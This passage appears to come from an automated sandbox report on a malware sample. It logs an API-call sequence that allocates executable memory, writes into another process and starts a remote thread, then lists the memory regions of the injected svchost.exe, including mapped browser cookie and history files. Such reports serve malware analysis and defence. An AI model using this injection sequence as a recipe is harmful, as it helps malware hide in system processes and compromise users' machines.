lpAddress=0x0, dwSize=0x1c000, flAllocationType=0x3000, flProtect=0x40) returned 0x70000 [0312.966] WriteProcessMemory (in: hProcess=0x150, lpBaseAddress=0x70000, lpBuffer=0xb570590*, nSize=0x1c000, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0xb570590*, lpNumberOfBytesWritten=0x0) returned 1 [0312.967] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x158, hTargetProcessHandle=0x150, lpTargetHandle=0x18f5bc, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x18f5bc*=0x4) returned 1 [0312.967] WriteProcessMemory (in: hProcess=0x150, lpBaseAddress=0x876c4, lpBuffer=0x18f5c4*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x18f5c4*, lpNumberOfBytesWritten=0x0) returned 1 [0312.967] WriteProcessMemory (in: hProcess=0x150, lpBaseAddress=0x877d0, lpBuffer=0x18f5b8*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x18f5b8*, lpNumberOfBytesWritten=0x0) returned 1 [0312.968] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x13c, hTargetProcessHandle=0x150, lpTargetHandle=0x18f5a0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x18f5a0*=0x8) returned 1 [0312.968] WriteProcessMemory (in: hProcess=0x150, lpBaseAddress=0x87d38, lpBuffer=0x18f5a0*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x18f5a0*, lpNumberOfBytesWritten=0x0) returned 1 [0312.968] CreateRemoteThread (in: hProcess=0x150, lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x795bc, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x15c [0312.968] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x7d0) returned 0x0 [0313.190] CloseHandle (hObject=0x15c) returned 1 [0313.190] CloseHandle (hObject=0x158) returned 1 [0313.190] CloseHandle (hObject=0x154) returned 1 [0313.190] CloseHandle (hObject=0x150) returned 1 [0313.190] CloseHandle (hObject=0x14c) returned 1 [0313.190] ExitProcess (uExitCode=0x0) [0313.191] UnhookWindowsHookEx (hhk=0x100e9) returned 1 [0313.192] CloseHandle (hObject=0x7c) returned 1 [0313.192] CloseHandle (hObject=0x80) returned 1 [0313.192] VirtualFree (lpAddress=0x1d40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0313.193] HeapDestroy (hHeap=0x1d30000) returned 1 Thread: id = 204 os_tid = 0x324 Process: id = "16" image_name = "svchost.exe" filename = "c:\\windows\\syswow64\\svchost.exe" page_root = "0x62704000" os_pid = "0x320" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "15" os_parent_pid = "0x6a4" cmd_line = "C:\\Windows\\SysWOW64\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f83e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2813 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2814 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2815 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2816 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 2817 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 2818 start_va = 0x70000 end_va = 0x8bfff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 2819 start_va = 0xb0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 2820 start_va = 0x190000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 2821 start_va = 0x960000 end_va = 0x967fff entry_point = 0x960000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\SysWOW64\\svchost.exe" (normalized: "c:\\windows\\syswow64\\svchost.exe") Region: id = 2822 start_va = 0x77ad0000 end_va = 0x77c78fff entry_point = 0x77ad0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2823 start_va = 0x77cb0000 end_va = 0x77e2ffff entry_point = 0x77cb0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2824 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 2825 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 2826 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 2827 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 2828 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 2829 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2830 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2831 start_va = 0x130000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 2832 start_va = 0x250000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 2833 start_va = 0x300000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 2834 start_va = 0x743d0000 end_va = 0x743d7fff entry_point = 0x743d0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2835 start_va = 0x743e0000 end_va = 0x7443bfff entry_point = 0x743e0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2836 start_va = 0x74440000 end_va = 0x7447efff entry_point = 0x74440000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2837 start_va = 0x778b0000 end_va = 0x779a9fff entry_point = 0x0 region_type = private name = "private_0x00000000778b0000" filename = "" Region: id = 2838 start_va = 0x779b0000 end_va = 0x77acefff entry_point = 0x0 region_type = private name = "private_0x00000000779b0000" filename = "" Region: id = 2839 start_va = 0x7efd8000 end_va = 0x7efdafff entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 2840 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2841 start_va = 0x1d0000 end_va = 0x236fff entry_point = 0x1d0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2842 start_va = 0x3c0000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 2843 start_va = 0x570000 end_va = 0x57ffff entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2844 start_va = 0x75800000 end_va = 0x7580bfff entry_point = 0x75800000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2845 start_va = 0x75810000 end_va = 0x7586ffff entry_point = 0x75810000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2846 start_va = 0x759c0000 end_va = 0x75acffff entry_point = 0x759c0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2847 start_va = 0x75e70000 end_va = 0x75f1bfff entry_point = 0x75e70000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2848 start_va = 0x76640000 end_va = 0x76685fff entry_point = 0x76640000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2849 start_va = 0x767d0000 end_va = 0x767e8fff entry_point = 0x767d0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2850 start_va = 0x76800000 end_va = 0x768effff entry_point = 0x76800000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2851 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2852 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2853 start_va = 0x758c0000 end_va = 0x759bffff entry_point = 0x758c0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2854 start_va = 0x76950000 end_va = 0x769dffff entry_point = 0x76950000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2855 start_va = 0x768f0000 end_va = 0x768f9fff entry_point = 0x768f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 2856 start_va = 0x76110000 end_va = 0x761acfff entry_point = 0x76110000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 2857 start_va = 0x77740000 end_va = 0x777dffff entry_point = 0x77740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 2858 start_va = 0x20000 end_va = 0x3dfff entry_point = 0x20000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2859 start_va = 0x580000 end_va = 0x707fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 2860 start_va = 0x20000 end_va = 0x3dfff entry_point = 0x20000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2861 start_va = 0x760b0000 end_va = 0x7610ffff entry_point = 0x760b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2862 start_va = 0x76570000 end_va = 0x7663bfff entry_point = 0x76570000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2863 start_va = 0x710000 end_va = 0x890fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000710000" filename = "" Region: id = 2864 start_va = 0x970000 end_va = 0x1d6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000970000" filename = "" Region: id = 2865 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 2866 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2867 start_va = 0x90000 end_va = 0x90fff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 2868 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2869 start_va = 0x1d70000 end_va = 0x2162fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001d70000" filename = "" Region: id = 2870 start_va = 0x76240000 end_va = 0x7635cfff entry_point = 0x76240000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 2871 start_va = 0x76360000 end_va = 0x7636bfff entry_point = 0x76360000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 2872 start_va = 0x76a70000 end_va = 0x776b9fff entry_point = 0x76a70000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 2873 start_va = 0x76370000 end_va = 0x763c6fff entry_point = 0x76370000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 2874 start_va = 0x75ad0000 end_va = 0x75ad4fff entry_point = 0x75ad0000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll") Region: id = 2875 start_va = 0x75ae0000 end_va = 0x75c3bfff entry_point = 0x75ae0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 2876 start_va = 0x75f20000 end_va = 0x76014fff entry_point = 0x75f20000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 2877 start_va = 0x76690000 end_va = 0x767c5fff entry_point = 0x76690000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 2878 start_va = 0x761b0000 end_va = 0x7623efff entry_point = 0x761b0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 2879 start_va = 0x75c40000 end_va = 0x75e3afff entry_point = 0x75c40000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 2880 start_va = 0x75690000 end_va = 0x75697fff entry_point = 0x75690000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 2881 start_va = 0x2170000 end_va = 0x23cffff entry_point = 0x0 region_type = private name = "private_0x0000000002170000" filename = "" Region: id = 2882 start_va = 0x75670000 end_va = 0x75685fff entry_point = 0x75670000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 2883 start_va = 0xf0000 end_va = 0x12bfff entry_point = 0xf0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2884 start_va = 0xf0000 end_va = 0x12bfff entry_point = 0xf0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2885 start_va = 0xf0000 end_va = 0x12bfff entry_point = 0xf0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2886 start_va = 0xf0000 end_va = 0x12bfff entry_point = 0xf0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2887 start_va = 0xf0000 end_va = 0x12bfff entry_point = 0xf0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2888 start_va = 0x75630000 end_va = 0x7566afff entry_point = 0x75630000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2889 start_va = 0x23d0000 end_va = 0x269efff entry_point = 0x23d0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2908 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 2909 start_va = 0x370000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 2910 start_va = 0x4d0000 end_va = 0x50ffff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 2911 start_va = 0x520000 end_va = 0x55ffff entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 2912 start_va = 0x8e0000 end_va = 0x91ffff entry_point = 0x0 region_type = private name = "private_0x00000000008e0000" filename = "" Region: id = 2913 start_va = 0x21d0000 end_va = 0x220ffff entry_point = 0x0 region_type = private name = "private_0x00000000021d0000" filename = "" Region: id = 2914 start_va = 0x2210000 end_va = 0x224ffff entry_point = 0x0 region_type = private name = "private_0x0000000002210000" filename = "" Region: id = 2915 start_va = 0x2280000 end_va = 0x22bffff entry_point = 0x0 region_type = private name = "private_0x0000000002280000" filename = "" Region: id = 2916 start_va = 0x22c0000 end_va = 0x22fffff entry_point = 0x0 region_type = private name = "private_0x00000000022c0000" filename = "" Region: id = 2917 start_va = 0x2300000 end_va = 0x233ffff entry_point = 0x0 region_type = private name = "private_0x0000000002300000" filename = "" Region: id = 2918 start_va = 0x2350000 end_va = 0x23cffff entry_point = 0x0 region_type = private name = "private_0x0000000002350000" filename = "" Region: id = 2919 start_va = 0x26e0000 end_va = 0x271ffff entry_point = 0x0 region_type = private name = "private_0x00000000026e0000" filename = "" Region: id = 2920 start_va = 0x2720000 end_va = 0x275ffff entry_point = 0x0 region_type = private name = "private_0x0000000002720000" filename = "" Region: id = 2921 start_va = 0x2790000 end_va = 0x27cffff entry_point = 0x0 region_type = private name = "private_0x0000000002790000" filename = "" Region: id = 2922 start_va = 0x2810000 end_va = 0x284ffff entry_point = 0x0 region_type = private name = "private_0x0000000002810000" filename = "" Region: id = 2923 start_va = 0x2850000 end_va = 0x288ffff entry_point = 0x0 region_type = private name = "private_0x0000000002850000" filename = "" Region: id = 2924 start_va = 0x28c0000 end_va = 0x28fffff entry_point = 0x0 region_type = private name = "private_0x00000000028c0000" filename = "" Region: id = 2925 start_va = 0x2950000 end_va = 0x298ffff entry_point = 0x0 region_type = private name = "private_0x0000000002950000" filename = "" Region: id = 2926 start_va = 0x7ef9b000 end_va = 0x7ef9dfff entry_point = 0x0 region_type = private name = "private_0x000000007ef9b000" filename = "" Region: id = 2927 start_va = 0x7ef9e000 end_va = 0x7efa0fff entry_point = 0x0 region_type = private name = "private_0x000000007ef9e000" filename = "" Region: id = 2928 start_va = 0x7efa1000 end_va = 0x7efa3fff entry_point = 0x0 region_type = private name = "private_0x000000007efa1000" filename = "" Region: id = 2929 start_va = 0x7efa4000 end_va = 0x7efa6fff entry_point = 0x0 region_type = private name = "private_0x000000007efa4000" filename = "" Region: id = 2930 start_va = 0x7efa7000 end_va = 0x7efa9fff entry_point = 0x0 region_type = private name = "private_0x000000007efa7000" filename = "" Region: id = 2931 start_va = 0x7efaa000 end_va = 0x7efacfff entry_point = 0x0 region_type = private name = "private_0x000000007efaa000" filename = "" Region: id = 2932 start_va = 0x7efad000 end_va = 0x7efaffff entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 2933 start_va = 0x7efd5000 end_va = 0x7efd7fff entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 2934 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 2935 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 2936 start_va = 0xf0000 end_va = 0xf1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 2937 start_va = 0x75490000 end_va = 0x7562dfff entry_point = 0x75490000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 2938 start_va = 0x100000 end_va = 0x100fff entry_point = 0x100000 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 2939 start_va = 0x110000 end_va = 0x111fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 2940 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 2941 start_va = 0x75480000 end_va = 0x7548afff entry_point = 0x75480000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 2942 start_va = 0x120000 end_va = 0x120fff entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 2943 start_va = 0x130000 end_va = 0x13bfff entry_point = 0x130000 region_type = mapped_file name = "index.dat" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 2944 start_va = 0x140000 end_va = 0x147fff entry_point = 0x140000 region_type = mapped_file name = "index.dat" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 2945 start_va = 0x150000 end_va = 0x15ffff entry_point = 0x150000 region_type = mapped_file name = "index.dat" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 2946 start_va = 0x120000 end_va = 0x120fff entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 2981 start_va = 0x120000 end_va = 0x120fff entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 2982 start_va = 0x120000 end_va = 0x120fff entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 2983 start_va = 0x120000 end_va = 0x12ffff entry_point = 0x120000 region_type = mapped_file name = "index.dat" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 2995 start_va = 0x150000 end_va = 0x17ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 3008 start_va = 0x75450000 end_va = 0x75470fff entry_point = 0x75450000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 3009 start_va = 0x76900000 end_va = 0x76944fff entry_point = 0x76900000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll") Region: id = 3010 start_va = 0x777e0000 end_va = 0x77814fff entry_point = 0x777e0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 3011 start_va = 0x767f0000 end_va = 0x767f5fff entry_point = 0x767f0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 3012 start_va = 0x2990000 end_va = 0x2b6ffff entry_point = 0x0 region_type = private name = "private_0x0000000002990000" filename = "" Region: id = 3037 start_va = 0x75400000 end_va = 0x75443fff entry_point = 0x75400000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 3038 start_va = 0x2d0000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 3039 start_va = 0x756b0000 end_va = 0x756cbfff entry_point = 0x756b0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 3040 start_va = 0x756e0000 end_va = 0x756e6fff entry_point = 0x756e0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 3041 start_va = 0x2990000 end_va = 0x2a8ffff entry_point = 0x0 region_type = private name = "private_0x0000000002990000" filename = "" Region: id = 3042 start_va = 0x2b30000 end_va = 0x2b6ffff entry_point = 0x0 region_type = private name = "private_0x0000000002b30000" filename = "" Region: id = 3043 start_va = 0x150000 end_va = 0x150fff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 3044 start_va = 0x150000 end_va = 0x150fff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 3045 start_va = 0x27d0000 end_va = 0x280ffff entry_point = 0x0 region_type = private name = "private_0x00000000027d0000" filename = "" Region: id = 3046 start_va = 0x2a90000 end_va = 0x2acffff entry_point = 0x0 region_type = private name = "private_0x0000000002a90000" filename = "" Region: id = 3047 start_va = 0x753e0000 end_va = 0x753f6fff entry_point = 0x753e0000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 3048 start_va = 0x7efd8000 end_va = 0x7efdafff entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 3049 start_va = 0x76a40000 end_va = 0x76a6cfff entry_point = 0x76a40000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\SysWOW64\\wintrust.dll" (normalized: "c:\\windows\\syswow64\\wintrust.dll") Region: id = 3050 start_va = 0x753a0000 end_va = 0x753d9fff entry_point = 0x753a0000 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\SysWOW64\\schannel.dll" (normalized: "c:\\windows\\syswow64\\schannel.dll") Region: id = 3051 start_va = 0x2170000 end_va = 0x21affff entry_point = 0x0 region_type = private name = "private_0x0000000002170000" filename = "" Region: id = 3052 start_va = 0x2c00000 end_va = 0x2c3ffff entry_point = 0x0 region_type = private name = "private_0x0000000002c00000" filename = "" Region: id = 3053 start_va = 0x7ef98000 end_va = 0x7ef9afff entry_point = 0x0 region_type = private name = "private_0x000000007ef98000" filename = "" Region: id = 3054 start_va = 0x75340000 end_va = 0x75391fff entry_point = 0x75340000 region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\SysWOW64\\rasapi32.dll" (normalized: "c:\\windows\\syswow64\\rasapi32.dll") Region: id = 3055 start_va = 0x75320000 end_va = 0x75334fff entry_point = 0x75320000 region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\SysWOW64\\rasman.dll" 